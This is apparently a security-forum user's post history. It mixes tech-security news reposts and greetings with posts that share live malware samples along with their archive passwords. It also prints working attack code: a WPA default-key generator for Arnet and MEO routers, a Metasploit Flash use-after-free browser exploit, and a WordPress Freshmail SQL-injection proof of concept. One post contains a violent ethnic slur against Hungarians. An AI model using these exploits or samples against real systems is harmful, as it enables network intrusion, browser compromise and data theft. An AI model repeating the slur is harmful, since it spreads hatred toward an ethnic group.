Aerosol

Everything posted by Aerosol

  1. Malware downloader using some anti-forensics (doesn't work), a UAC bypass method (uacme concept #10), and seemingly full of specific code for various AVs' behaviour detection systems. According to VT there is no meaningful name for it from AV yet. The loader probably comes from a script kiddie who previously worked on ransomware(s), nickname "Phobos". Reviewed by damagelab -> https://damagelab.org/index.php?showtopic=25839 (site unavailable at the moment of posting). Except for the UAC bypass, so far there is nothing interesting in this loader. The malware injects itself into a copy of explorer.exe and, by using IFileOperation autoelevation (triggers UAC if set on max), copies bthudtask.exe to the system32\setup folder. Next it makes a copy of the system dll newdev.dll, patches it with shellcode (EPO + new section) and, again with IFileOperation (triggering UAC a 2nd time), copies this dll into system32\setup. Next the loader starts bthudtask.exe with ShellExecuteEx. As a result, classic dll hijacking happens, and since bthudtask.exe is autoelevated, the malware stored inside the patched newdev.dll will be running at High IL. This autoelevation method abuses the way MS did whitelisting with UAC, where it controls neither the full path to the autoelevated application (while they actually must all be hardcoded) nor the loading path of application-specific dlls (even if the application is inside system32 you must control it too), allowing an attacker to do all required manipulations inside the Windows folder, preparing things for successful dll hijacking. After successful elevation you will see a hit-parade of spawning processes - two copies of explorer.exe, for example, or svchost.exe if something went wrong. That circus is not suspicious at all, sarcasm. There was an interesting overview of successful/failed autoelevations in the damagelab post. Statistical data show that most people (in targeted countries) sit under default UAC settings (or with UAC turned off) even on Windows 8.1.
Please don't be shy and submit the sample to as many AV companies as you can. VT dropper: https://www.virustotal.com/en/file/903d299b366ef1ba11538924dd57811aff80b8b91123889b872a098639a8effa/analysis/1431575696/ VT loader part: https://www.virustotal.com/en/file/ad3ba3bcd64aa9670389bedebe328c6874c96f2dea6ec2abb41b8c7537dc3d8d/analysis/1431574970/ Sample courtesy of vaber and R136a1. Dropper and newdev.dll patched by shellcode in attachment. Download Pass: malware Source
  2. Download: here is a sample of W2KM_BARTALEX.VVRA. This MS Office file, when executed, downloads UPATRE and DYRE, also attached: https://www.virustotal.com/en/file/25da9335c1e791a39895bcebe6bff322e9bff5f91e53cf36383d1f223a7752d1/analysis/ and here are the downloaded files: Download TROJ_UPATRE.VVRA.zip Download TSPY_DYRE.VVRA.zip Source
  3. Hi, attached is the variant of Sednit which uses the local privilege escalation vulnerability CVE-2015-1701. More information: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html Download Pass: infected Source
  4. There's an extremely critical bug in the Xen, KVM, and native QEMU virtual machine platforms and appliances that makes it possible for attackers to break out of protected guest environments and take full control of the operating system hosting them, security researchers warned Wednesday. The vulnerability is serious because it pierces a key protection that many cloud service providers use to segregate one customer's data from another's. If attackers with access to one virtualized environment can escape to the underlying operating system, they could potentially access all other virtual environments. In the process, they would be undermining one of the fundamental guarantees of virtual machines. Compounding the severity, the vulnerability resides in a low-level disk controller, allowing it to be exploited when guest or host OSes alike run Linux, Windows, Mac OS X, or possibly other OSes. Researchers from security firm CrowdStrike, who first warned of the vulnerability, wrote: The vulnerability is the result of a buffer-overflow bug in QEMU's virtual Floppy Disk Controller, which is used in a variety of virtualization platforms and appliances. It is known to affect Xen, KVM, and the native QEMU client software, and it may affect others. VMware, Microsoft Hyper-V, and Bochs hypervisors are not affected. At publication time, patches were available from the Xen Project and the QEMU Project. RedHat has a patch here. There are also workarounds users can follow to lessen the risk of exploitation. The vulnerability is serious enough that users of other virtualization packages should immediately contact the developers to find out if they're susceptible. The bug has existed since 2004. There's no indication that the vulnerability is being actively exploited maliciously in the wild. Although the vulnerability is agnostic of the OS running both the guest and host, attack code exploiting the bug must have administrative or root privileges to the guest. 
The threat is greatest for people who rely on virtual private servers, which allow service providers to host multiple operating systems on a single physical server. Because virtual servers are often provided to different customers, it's common that they have administrative or root privileges to that guest OS that could be used to take over the underlying machine. CrowdStrike's advisory went on to state: For those who are unable to patch vulnerable software, CrowdStrike offered the following: The vulnerability has been dubbed Venom, short for virtualized environment neglected operations manipulation. Some people are already comparing its severity to Heartbleed, the catastrophic bug disclosed in April 2014 that exposed private cryptography keys, end-user passwords, and other sensitive data belonging to countless services that used the OpenSSL crypto library. At this early stage, it's too early to know if the comparison to Heartbleed is exaggerated, since at the moment there's no indication that Venom is being actively exploited. Tod Beardsley, a research manager at vulnerability assessment provider Rapid7, has indicated that the threat from Venom is likely not as serious. In an e-mailed statement, he wrote: Those limitations aside, there's an extremely broad range of platforms that are vulnerable to this exploit, and those platforms house servers used by banks, e-commerce providers, and countless other sensitive services. Given the large number of servers that are vulnerable and the extremely high value of the assets they contain, this security bug should be considered a top priority. Source
  5. A former cop and owner of the website Polygraph.com has pleaded guilty to five charges of obstruction of justice and mail fraud for teaching people how to cheat lie detector tests. Douglas Williams, 69, of Norman, Oklahoma, faces up to 20 years in jail and up to a $250,000 fine for selling polygraph-evasion training to two clients who were actually part of an undercover sting operation. The first undercover operative posed as an agent with the Department of Homeland Security and told Williams that he wanted to conceal the fact that he had been involved with smuggling drugs through the airport where he worked. A second undercover agent told Williams he was applying for a job with the Border Patrol and wanted to hide his criminal history. Williams told both clients – who paid him $1,000 if they traveled to his home and $5,000 if he traveled to meet them (plus travel expenses) – that they should deny they had received his training. According to the indictment [PDF] brought against Williams, when the operative posing as a DHS agent admitted he was lying about his innocence, Williams exploded: "I told you I’m assisting you under the assumption that you are telling the truth. What the fuck do you think you’re doing dumbass? Do you think you have, do you think you have like a lawyer confidentiality with me?" But in truth, Williams was undeterred and continued to train the self-styled DHS agent. He grew paranoid and told his client to change his cell phone number and to respond to a new email he sent him from "the paranoid chicken." Then just hours later he changed his mind about changing the telephone number and focused instead on getting paid through an untraceable money order. Money talks: Ten days later, Williams flew to meet the so-called DHS agent, who again admitted he had helped smuggle drugs on four occasions. Nonetheless, Williams continued to train him in how to lie – which is a big no-no when you work for the US Department of Justice.
"Lying, deception and fraud cannot be allowed to influence the hiring of national security and law enforcement officials, particularly when it might affect the security of our borders," said Assistant Attorney General Caldwell of the Justice Department’s Criminal Division in a statement announcing Williams' guilty plea. "Today’s conviction sends a message that we pursue those who attempt to corrupt law enforcement wherever and however they may try to do so." Williams was more careful when talking about his services in a promotional video. "Even if you tell the complete truth, you will fail 50 per cent of the time," he said in the video, explaining that lie detectors assume that being nervous when you are asked a question indicates you are guilty of whatever was asked. "Why fail?" Williams asks. "Just because you're nervous doesn't mean you're lying. I can teach you how to pass, nervous or not, no matter what." But the Justice Department holds that he crossed the line when he readily trained people who he believed had criminal records and were hoping to conceal their crimes from government authorities. According to the indictment, which was handed down in November, Williams told one of the undercover agents, "I don’t give a damn if you’re the biggest heroin dealer in the fucking United States." Later he added: "I haven't lived this long and fucked the government this long, and done such a controversial thing that I do for this long, and got away with it without any trouble whatsoever, by being a dumb ass." The DoJ would beg to differ. Source
  6. Scammers use phishing emails to get consumers to click on links to websites they've created solely for the purpose of information theft. They trick users into typing their names, addresses, login IDs, passwords or credit card information into fields on sites that look like they belong to real companies. In some cases, just clicking the link provided in an email will automatically drop malware onto the user's device. Once the malware is installed, hackers can easily steal the victim's information without their knowledge. Phishers are getting better and better at making their traps look real, copying logos and creating sham URLs and email addresses that look like actual corporate credentials. The Intel quiz displayed 10 real emails delivered to inboxes and collected by analysts at McAfee Labs, which is part of Intel Security. Some were legitimate correspondence from major companies, while others were phishing emails that look extremely believable. Of the 19,458 people who took the quiz, the vast majority -- 80 percent -- fell for at least one of the fake phishing emails they saw. Only 3 percent got a perfect score. Interestingly, the one email that was most often misidentified in the quiz was actually a legitimate letter. It raised false alarm bells by encouraging readers to claim free ads, a clicky turn of phrase that made people wary. Compared to the other 143 countries represented in the survey, the U.S. ranked 27th overall in ability to detect phishing. Americans' average 68 percent accuracy was just a few points above the global average. France, Sweden, Hungary, the Netherlands and Spain turned in the best performances. The results serve as yet another reminder to click with caution -- or not click at all. Intel Security's Gary Davis urged people to keep security software and browsers up to date to help weed out malicious sites and downloads, and to hover over links before clicking on them to make sure they point where they say they do.
He also warned of obvious red flags, such as misspellings or bad grammar, that can help tip you off to a fraudulent correspondence. Want to see how you'd do on the quiz? You can try your hand at it above. If you don't score well, don't take it too hard. When Intel circulated an earlier version of it to Internet security professionals last year, 94 percent were fooled at least once. Source
  7. Hi and welcome, brother, I hope you like it here.
  8. Congratulations @sleed and good luck with the searching going forward!
  9. Aerosol

    Hi

    But NOT the way you said it: My eyes... OFF:// there is no point writing with diacritics if you don't know how to write correctly in terms of grammar or how to use punctuation. On:// Welcome; it's not ok to jump into an argument when you know you are NOT right. I hope you stay with us as long as possible and learn useful things. @Bright that is NOT an excuse, I have moments when I don't even get those 2 hours of sleep!
  10. Aerosol

    hi

    Hi Sorin.
  11. Hi and "welcome"!
  12. Aerosol

    Hello

    Cheers and welcome!
  13. S-a trezit acum si Ponta. _|_ ANTI-BOZGORI ( afara cu bozgorii din tara romaneasca ) On:// Care este cel mai bun Ungur? Ala ce nu mai respira (sau sta in tara LUI)!
  14. Very many, e.g.: who knows what is inside such a theme (possibly some shell); by uploading themes like that to a site (without having the knowledge) you can unintentionally "give access" to the site to the person who put the shell in the theme, or who knows what else...
  15. Infects files on removable disks and remote network drives. Description: Virus:Win32/Ursnif. VT: https://www.virustotal.com/en/file/8fa8122cfa52d7ff7fd8d918ccc9089a1762420c23edb6c50e8573456bfcdde3/analysis/1430975102/ https://www.virustotal.com/en/file/9bd91d207911b08489079c3927478b824b7948b741e1b6221339893581e4e9cb/analysis/1430976279/ Download Malware Pass: infected Source
  16. Win32k Elevation of Privilege Vulnerability. Allows code to be executed in kernel mode. Used by malware to target Windows 7. Apply MS15-051 for fix. https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html https://github.com/hfiref0x/CVE-2015-1701 Download pass: exploit Source
  17. The 16 million Starbucks customers who use the company’s mobile payment service may want to strengthen their log-in credentials and reconsider using the auto-load feature. Independent journalist and best-selling author Bob Sullivan reported on Monday that hackers recently stole money from several Starbucks customers by gaining access to their credit card information through the Starbucks app and using the auto-load function. Sullivan described how one Starbucks customer had $34.77 stolen from her account last week, another $25 after it was auto-loaded, and another $75 after the hackers changed her auto-load amount. All of this took place in less than ten minutes. Sullivan cites three other Starbucks customers who had their accounts hacked within the past month. This Reddit thread shows a handful of others who had similar issues. Some hackers even used stolen accounts to email gift cards to themselves. “Essentially, any criminal who obtains username and password credentials to Starbucks.com can drain a consumer’s stored value, and attack their linked credit card,” Sullivan noted. Sullivan added that hackers who gain access to a Starbucks card can move balances to a card or account they control by changing a victim’s email address used for a transfer verification code. “Because the crime is so simple, can escalate quickly, and the consumer protections controlling the transaction are unclear, I recommend all Starbucks consumers immediately disable auto-reload on the Starbucks mobile payments and gift cards,” Sullivan wrote. Starbucks spokeswoman Maggie Jantzen told GeekWire that these recent incidents are “not widespread” and noted that “customer security is incredibly important to us.” “We have safeguards in place to constantly monitor for fraudulent activity and, like all major retailers, work closely with financial institutions to make sure our customers are protected,” she said. 
Jantzen also said that Starbucks encourages customers to “use several best practices to ensure their information is as protected as possible,” like strong passwords. “Customers are not responsible for charges or transfers they did not make and if a customer’s Card is registered, their account balance is protected,” she added. “If a customer sees unauthorized activity on their account, we encourage them to contact us immediately.” This is not the first time hackers have taken advantage of Starbucks’ auto-load feature, with customers noticing similar issues dating back to 2013. Starbucks has placed a big emphasis on mobile transactions over the past few years, with CEO Howard Schultz noting late last year that 16 percent of its U.S. sales came from a smartphone. Starbucks also recently suffered a massive point-of-sale computer outage that struck stores in the U.S. and Canada last month. Source
  18. Security researchers are warning PC users in Australia to beware of new Breaking Bad-themed ransomware demanding up to $1000 AUD ($796 USD) to decrypt essential computer files. The attacks typically arrive in the form of a malicious zip archive which takes the name of a famous delivery firm as its file name, according to Symantec. The AV giant continued in a blog post: “This zip archive contains a malicious file called ‘PENALTY.VBS’ (VBS.Downloader.Trojan) which when executed, downloads the crypto ransomware onto the victim’s computer. The threat also downloads and opens a legitimate .pdf file to trick users into thinking that the initial zip archive was not a malicious file. Based on our initial analysis, the threat appears to be using components or similar techniques to an open-source penetration-testing project, which uses Microsoft PowerShell modules. This allows the attackers to run their own PowerShell script on the compromised computer to operate the crypto ransomware.” The ransom demand message that flashes up to victims uses the Los Pollos Hermanos brand, as seen in Breaking Bad – demanding they pay $450 within a specified time or else the charge will rise to $1000. The email provided for “support-related enquiries” also references lead character Walter White’s description of himself in season four as “the one who knocks.” The victim’s images, videos, documents and other important files are encrypted using a random AES key which is in turn encrypted with an RSA public key. This requires them to obtain the corresponding private key from the attackers to effectively get their files back. Also included is a handy video tutorial on how to buy bitcoins – in order to help victims pay the ransom. Symantec said its customers were protected from Trojan.Cryptolocker.S and referred worried netizens to its dedicated blog on ransomware. Cyber-criminals are increasingly turning to ransomware as an easy way to make a fast buck – sometimes with tragic results. 
In January it was reported that a 17-year-old student from Windsor committed suicide after receiving messages that he’d visited illegal sites and that indecent images had been found on his computer. Source
  19. WE’VE SUSPECTED IT all along—that Skynet, the massive program that brings about world destruction in the Terminator movies, was just a fictionalization of a real program in the hands of the US government. And now it’s confirmed—at least in name. As The Intercept reports today, the NSA does have a program called Skynet. But unlike the autonomous, self-aware computerized defense system in Terminator that goes rogue and launches a nuclear attack that destroys most of humanity, this one is a surveillance program that uses phone metadata to track the location and call activities of suspected terrorists. A journalist for Al Jazeera reportedly became one of its targets after he was placed on a terrorist watch list. Ahmad Muaffaq Zaidan, bureau chief for Al Jazeera’s Islamabad office, got tracked by Skynet after he was identified by US intelligence as a possible Al Qaeda member and assigned a watch list number. A Syrian national, Zaidan has scored a number of exclusive interviews with senior Al Qaeda leaders, including Osama bin Laden himself. Skynet uses phone location and call metadata from bulk phone call records to detect suspicious patterns in the physical movements of suspects and their communication habits, according to a 2012 government presentation The Intercept obtained from Edward Snowden. The presentation indicates that Skynet looks for terrorist connections based on questions such as “who has traveled from Peshawar to Faisalabad or Lahore (and back) in the past month? Who does the traveler call when he arrives?” It also looks for suspicious behaviors such as someone who engages in “excessive SIM or handset swapping” or receives “incoming calls only.” The goal is to identify people who move around in a pattern similar to Al Qaeda couriers who are used to pass communication and intelligence between the group’s senior leaders. 
The program tracked Zaidan because his movements and interactions with Al Qaeda and Taliban leaders matched a suspicious pattern—which is, it turns out, very similar to the pattern of journalists meeting with sources. We should note that the NSA has a second program that more closely resembles the Terminator‘s Skynet. This one is called MonsterMind, as revealed by Edward Snowden last year in an interview with WIRED and James Bamford. MonsterMind, like the film version of Skynet, is a defense surveillance system that would instantly and autonomously neutralize foreign cyberattacks against the US, and could be used to launch retaliatory strikes as well. Under this program algorithms would scour massive repositories of metadata and analyze it to differentiate normal network traffic from anomalous or malicious traffic. Armed with this knowledge, the NSA could instantly and autonomously identify, and block, a foreign threat. Snowden also suggested, however, that MonsterMind could one day be designed to return fire—automatically, without human intervention—against an attacker. Because an attacker could tweak malicious code to avoid detection, a counterstrike would be more effective in neutralizing future attacks. Sounds a lot like Skynet. No word from the NSA on why they didn’t use that iconic film name for its real-world Skynet. Source
  20. Cisco has patched a remote code execution bug that could give attackers root privileges on its Unified Computing System (UCS) Central software used by more than 30,00 organisations. The UCS data centre server platform joins hardware, virtualisation, networking and software into one system. Versions 1.2 and below are affected. The Borg says the vulnerability (CVE-2015-0701) rates the maximum 10 severity rating due to its low exploitation requirements and "complete" impact to confidentiality, integrity and availability. "A vulnerability in the web framework of Cisco UCS Central Software could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device," it says in an advisory. "The vulnerability is due to improper input validation. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the root user." The Borg says patches for the bug are available but warns there are no workarounds. Successful exploitation of the problem would grant unauthenticated access to sensitive information, allow arbitrary command execution on UCS boxes' operating systems, or create denial of service conditions. Happily, no attacks using the flaw have been spotted in the wild. Source
  21. #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@license: GPLv3
@author : Eduardo Novella

@ARNetOnline via Twitter @enovella_

2014-09-15 Send a message via website, still looking for a simple mail (http://www.telecom.com.ar/hogares/contacto_tecnico.html)
2014-09-16 Send another message to Arnet via website. First reply via twitter where they redirect me to the website form.
2014-09-19 Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20 More twitter PM about the same. They do not want to be aware about the problem though.
2014-09-23 I assume that Arnet does not care about its clients' security at all regarding its little interest.
2014-09-24 I send the problem to the vendor ADB Pirelli via website form
2014-09-28 I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05 Full disclosure and CVE-2015-0558 assigned

PORTUGAL
================
2015-04-01 I receive an email confirming that the Portuguese ISP "MEO" uses the same algorithm
2015-04-05 Send a message to @MEOpt via Twitter @enovella_
2015-04-05 I got response in matter of minutes \o/
2015-04-05 I send an email to luis-oliveira-cc@telecom.pt , stating the reference 3-78405621289 in email subject
2015-05-07 Full disclosure

-----------------
[*] Changelog :
-----------------
2015-05-06 v1.4 Added MEO routers in Portugal. Essid ADSLPT-ABXXXXX
2015-02-01 v1.3 Final version, hopefully
2015-01-12 v1.2 Confusion between LAN and WLAN mac address
2015-01-10 v1.1 --allKeys flag added
2014-09-11 v1.0 First PoC working
'''

import re
import sys
import hashlib
import argparse

VERSION = 1
SUBVERSION = 4
DATEVERSION = '2015-05-06'
URL = 'http://www.ednolo.alumnos.upv.es'


def genkey(mac, stdout='True'):
    # Key = first 10 bytes of SHA256(seed || '1236790' || mac), mapped to [0-9a-z]
    seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +
            '\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8')
    lookup = '0123456789abcdefghijklmnopqrstuvwxyz'
    sha256 = hashlib.sha256()
    sha256.update(seed)
    sha256.update('1236790')
    sha256.update(mac)
    digest = bytearray(sha256.digest())
    if (stdout):
        print "[+] SHA256 : %s" % sha256.hexdigest()
    return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])


def printTargets():
    print "[+] Possible vulnerable targets so far:"
    for t in targets:
        print ("\t bssid: {0:s}:XX:XX:XX \t essid: WiFi-Arnet-XXXX, ADSLPT-ABXXXXX".format(t.upper()))
    sys.exit()


def checkTargets(bssid):
    supported = False
    for t in targets:
        if (bssid.upper().startswith(t)):
            supported = True
            break
    if (not supported):
        print "[!] Your bssid looks like not supported! Generating anyway."


def addIncToMac(mac_str, inc):
    # Return the MAC as raw bytes after adding an integer offset to it
    try:
        mac = bytearray.fromhex('%012x' % (int(mac_str, 16) + inc))
    except:
        sys.exit('[!] Use real input ')
    return mac


def main():
    global targets
    version = " {0:d}.{1:d} [{2:s}] ----> {3:s}".format(VERSION, SUBVERSION, DATEVERSION, URL)
    targets = ['00:08:27', '00:13:C8', '00:17:C2', '00:19:3E', '00:1C:A2', '00:1D:8B', '00:22:33', '00:8C:54',
               '30:39:F2', '74:88:8B', '84:26:15', 'A4:52:6F', 'A4:5D:A1', 'D0:D4:12', 'D4:D1:84', 'DC:0B:1A', 'F0:84:2F']

    parser = argparse.ArgumentParser(description='''>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina and MEO in Portugal.
So far only WiFi networks with essids like WiFi-Arnet-XXXX or ADSLPT-ABXXXXX and manufactured by Pirelli are likely vulnerable.
See http://ednolo.alumnos.upv.es/ for more details.
Twitter: @enovella_ and email: ednolo[at]inf.upv.es.
This software is used just as proof-of-concept, commit fraud depends on you! ''',
                                     epilog='''(+) Help: python %s -b 74:88:8B:AD:C0:DE ''' % (sys.argv[0]))

    maingroup = parser.add_argument_group(title='required')
    maingroup.add_argument('-b', '--bssid', type=str, nargs='?', help='Target mac address')
    parser.add_argument('-v', '--version', action='version', version='%(prog)s' + version)
    command_group = parser.add_mutually_exclusive_group()
    command_group.add_argument('-l', '--list', help='List all vulnerable targets', action='store_true')
    command_group.add_argument('-a', '--allkeys', help='Bruteforce mode', action="store_true")

    args = parser.parse_args()

    if args.list:
        printTargets()
    elif args.bssid:
        mac_str = re.sub(r'[^a-fA-F0-9]', '', args.bssid)
        if len(mac_str) != 12:
            sys.exit('[!] Check MAC format!\n')
        try:
            checkTargets(args.bssid)
            print '[+] MAC : %s' % args.bssid
            if (args.allkeys):
                # Try neighbouring MACs, since the LAN and WLAN addresses differ by a small offset
                print '\n[+] WPA keys for SSID: WiFi-Arnet-XXXX (Argentina)'
                for i in xrange(-2, 5):
                    mac = addIncToMac(mac_str, i)
                    print '%-10s' % ((genkey(mac, False)))
                print '\n[+] WPA keys for SSID: ADSLPT-ABXXXXX (Portugal)'
                for i in xrange(-2, 5):
                    mac = addIncToMac(mac_str, i)
                    print '%-10s' % ((genkey(mac, False)[:8]))
            else:
                wpa = genkey((addIncToMac(mac_str, 0)), False)
                print '[+] WPA key : %-10s\t%-10s' % (wpa, "SSID: WiFi-Arnet-XXXX (Argentina)")
                print '[+] WPA key : %-10s\t%-10s' % (wpa[:8], "SSID: ADSLPT-ABXXXXX (Portugal)")
        except:
            sys.exit('[!] Are you trying to crash me? ')
    else:
        parser.print_help()


if __name__ == "__main__":
    main()

Source
  22. ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Adobe Flash Player domainMemory ByteArray Use After Free',
      'Description'    => %q{
        This module exploits a use-after-free vulnerability in Adobe Flash Player. The
        vulnerability occurs when the ByteArray assigned to the current ApplicationDomain
        is freed from an ActionScript worker, when forcing a reallocation by copying more
        contents than the original capacity, but Flash forgets to update the domainMemory
        pointer, leading to a use-after-free situation when the main worker references the
        domainMemory again. This module has been tested successfully on Windows 7 SP1
        (32-bit), IE 8 and IE11 with Flash 17.0.0.134.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'bilou',        # Vulnerability discovery according to Flash Advisory
          'Unknown',      # Exploit in the wild
          'hdarwin',      # @hdarwin89 / public exploit (msf module is based on this one)
          'juan vazquez'  # msf module
        ],
      'References'     =>
        [
          ['CVE', '2015-0359'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'],
          ['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'],
          ['URL', 'https://git.hacklab.kr/snippets/13'],
          ['URL', 'http://pastebin.com/Wj3NViUu']
        ],
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => OperatingSystems::Match::WINDOWS_7,
          :ua_name => Msf::HttpClients::IE,
          :flash   => lambda { |ver| ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') },
          :arch    => ARCH_X86
        },
      'Targets'        =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 14 2014',
      'DefaultTarget'  => 0))
  end

  def exploit
    @swf = create_swf
    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf')
    swf = ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end

end

Source
  23. ------------------------
ISSUE 1:

# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: http://freshmail.com/
# Software Link: https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps

1. Summary
------------------

Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them.

There is a SQL Injection vulnerability available for collaborators (or higher privileged users) for webs with freshmail plugin installed. The SQL Injection is located in the attribute "id" of the inserted shortcode [FM_form id="N"]. The shortcode attribute "id" is not sanitized before inserting it in a SQL query. A collaborator can insert shortcodes when he/she is editing a new post or page and can preview the results (no administrator approval needed), launching this SQL Injection.

2. Vulnerability timeline
----------------------------------

- 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter.
- 05/05/2015: Send the details by mail to developer.
- 05/05/2015: Response from the developer.
- 06/05/2015: Fixed version in 1.6

3. Vulnerable code
---------------------------

Vulnerable File: include/shortcode.php, lines 27 and 120:

Line 19: function fm_form_func($atts)
[...]
Line 27: $form_value = $wpdb->get_row("select * from ".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";');
[...]
Line 120: add_shortcode('FM_form', 'fm_form_func');

4. Proof of concept
---------------------------

1. As collaborator, start a new post.
2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b']
3. Click preview.
4. If the form is shown, the statement is true, if not, false.

POST /wp-admin/post.php HTTP/1.1
Host: <web>
Content-Length: 3979
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: <web>
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary384PE6lRgBcOibkL
Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_f305[...]

------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wpnonce"

0a75a3666b
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/post.php?post=69&action=edit&message=8
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="user_ID"

4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="action"

editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="originalaction"

editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_author"

4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_type"

post
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_post_status"

pending
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="referredby"

http://<web>/wp-admin/post.php?post=69&action=edit&message=8
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_original_http_referer"

http://<web>/wp-admin/post.php?post=69&action=edit&message=8
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_ID"

69
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="meta-box-order-nonce"

f8aa04e508
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="closedpostboxesnonce"

ebf65a43ed
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_title"

Testing SQLi in shortcode
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="samplepermalinknonce"

e753a2d8f2
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="content"

[FM_form id='1" and substr(user(),1,1)="b]
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="wp-preview"

dopreview
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_publish"

Submit for Review
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_format"

0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"

0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"

1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="tax_input[post_tag]"


------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="newtag[post_tag]"


------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="excerpt"


------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="trackback_url"


------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyselect"

#NONE#
------WebKitFormBoundary384PE6lRgBcOibkL
